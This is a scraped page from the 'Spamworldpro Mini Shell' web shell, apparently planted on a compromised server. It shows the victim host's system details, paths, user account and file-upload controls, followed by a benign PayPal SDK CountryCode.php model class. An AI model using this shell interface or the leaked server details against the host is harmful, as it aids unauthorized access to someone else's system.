Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/mcoil.corals.io/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/mcoil.corals.io/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/CountryCode.php
<?php

namespace PayPal\Api;

use PayPal\Common\PayPalModel;

/**
 * Class CountryCode
 *
 * Representation of a country code.
 *
 * @package PayPal\Api
 *
 * @property string country_code
 */
class CountryCode extends PayPalModel
{
    /**
     * ISO country code based on 2-character IS0-3166-1 codes.
     *
     * @param string $country_code
     * 
     * @return $this
     */
    public function setCountryCode($country_code)
    {
        $this->country_code = $country_code;
        return $this;
    }

    /**
     * ISO country code based on 2-character IS0-3166-1 codes.
     *
     * @return string
     */
    public function getCountryCode()
    {
        return $this->country_code;
    }

}

Spamworldpro Mini